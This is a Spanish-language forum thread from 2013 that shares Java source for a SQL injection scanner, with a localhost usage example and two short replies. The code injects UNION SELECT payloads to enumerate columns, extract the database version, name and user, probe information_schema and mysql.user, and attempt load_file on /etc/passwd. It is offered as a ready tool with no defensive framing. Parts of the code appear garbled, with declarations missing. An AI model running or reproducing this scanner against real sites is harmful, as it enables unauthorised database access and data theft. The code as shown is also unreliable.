Título: [Java] SQL Scanner 0.1
Publicado por: BigBear en 13 Enero 2013, 03:40 am
Un simple Scanner SQLI hecho en Java. //SQL Scanner 0.1 //Coded By Doddy H import java.util.Scanner; import java.io.*; import java.net.*; import java.util.regex.Matcher; import java.util.regex.Pattern; public class Main { Pattern uno = null; Matcher dos = null; Scanner host = new Scanner (System. in); System. out. println("\n\n-- == SQL Scanner 0.1 == --\n\n"); System. out. println("[+] Page : "); target = host.nextLine(); System. out. println("\n[+] Checking ...\n"); codex = toma(target + "-1+union+select+666--"); uno = Pattern.compile("The used SELECT statements have a different number of columns"); dos = uno.matcher(codex); if (dos.find()) { System. out. println("[+] Scanning ...\n"); int x; urlfinal = ""; formariny = ""; for (x = 1; x <= 5; x = x + 1) { //urlfinal = urlfinal+x+","; urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ","; formariny = formariny + x + ","; otrofinal = urlfinal; otroformar = formariny; otrofinal = otrofinal.substring(0, otrofinal.length() - 1); otroformar = otroformar.substring(0, otroformar.length() - 1); code = toma(target + "-1+union+select+" + otrofinal); uno = Pattern.compile("RATSXPDOWN(\\d+)"); dos = uno.matcher(code); if (dos.find()) { otroformar = otroformar.replace(dos.group(1), "hackman"); link = target + "-1+union+select+" + otroformar; System. out. println("[Target] : " + link ); System. out. println("[Limit] : The site has " + x + " columns"); System. out. println("[Data] : The number " + dos. group(1) + " print data"); savefile("logs-scansql.txt", "[Target] : " + link); savefile("logs-scansql.txt", "[Limit] : The site has " + x + " columns"); savefile("logs-scansql.txt", "[Data] : The number " + dos.group(1) + " print data"); System. out. println("\n[+] Searching informaion ...\n"); details(link); System. out. println("\n[+] Finished"); System. out. println("\n-- == Coded By Doddy H == --"); savefile("logs-scansql.txt", "\n-----------------\n"); } } System. out. println("[-] Error"); } else { System. out. 
println("[-] Not vulnerable"); } } Pattern uno = null; Matcher dos = null; concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))"; urla = urla.replace("hackman", concat); code = toma(urla); uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] DB Version : " + dos. group(1)); System. out. println("[+] DB Name : " + dos. group(2)); System. out. println("[+] Username : " + dos. group(3)); savefile("logs-scansql.txt", "[+] DB Version : " + dos.group(1)); savefile("logs-scansql.txt", "[+] DB Name : " + dos.group(2)); savefile("logs-scansql.txt", "[+] Username : " + dos.group(3)); } else { System. out. println("[-] Not found any data"); } urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)"); code = toma(urla + "+from+information_schema.tables--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] information_schema : on"); savefile("logs-scansql.txt", "[+] information_schema : on"); } else { System. out. println("[-] information_schema : off"); } code = toma(urla + "+from+mysql.user--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] mysqluser : on"); savefile("logs-scansql.txt", "[+] mysqluser : on"); } else { System. out. println("[-] mysquser : off"); } urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))"); //ystem.out.print(urla); code = toma(urla); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[-] load_file : on"); savefile("logs-scansql.txt", "[-] load_file : on"); } else { System. out. 
println("[-] load_file : off"); } } writer.write(texto + "\r\n"); writer.close(); } hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); while ((re = nave.readLine()) != null) { conte.append(re); } nave.close(); return conte.toString(); } //Thanks to Katarina Majetic //Based on http://www.dzone.com/snippets/encode-string-hex byte[] z = text.getBytes(); int n; int a = z.length; int u; for (n = 0; n < a; n++) { u = z[n] & 0x000000FF; h.append(l); } return "0x" + h.toString(); } } //The End ?
Ejemplo de uso -- == SQL Scanner 0.1 == --
[+] Page : http://localhost/sql.php?id=
[+] Checking ...
[+] Scanning ...
[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3 [Limit] : The site has 3 columns [Data] : The number 1 print data
[+] Searching informaion ...
[+] DB Version : 5.5.20-log [+] DB Name : hackman [+] Username : root@localhost [+] information_schema : on [+] mysqluser : on [-] load_file : off
[+] Finished
-- == Coded By Doddy H == --
Título: Re: [Java] SQL Scanner 0.1
Publicado por: sapito169 en 13 Enero 2013, 20:01 pm
Muchas gracias y felicitaciones por tu aporte. Hay cosas que muestras que no conozco a profundidad y que quisiera conocer mejor.
Pero hay otras cosas que son muy incómodas.
La primera es que publicaste el mismo post varias veces.
La segunda es que solo te limitaste a poner el código, lo cual es molesto porque es difícil saber qué estás haciendo; sería mejor que pusieras un poco más de texto explicando qué haces y dando una pequeña introducción teórica, o aunque sea explicando qué hace el código y por qué.
Título: Re: [Java] SQL Scanner 0.1
Publicado por: BigBear en 13 Enero 2013, 21:34 pm
Sí, me gusta hacer traducciones: hago el mismo programa en todos los lenguajes que conozco. Eso sí, al próximo código que publique le agrego un ejemplo de uso.
PD: le agregué el ejemplo de uso al post.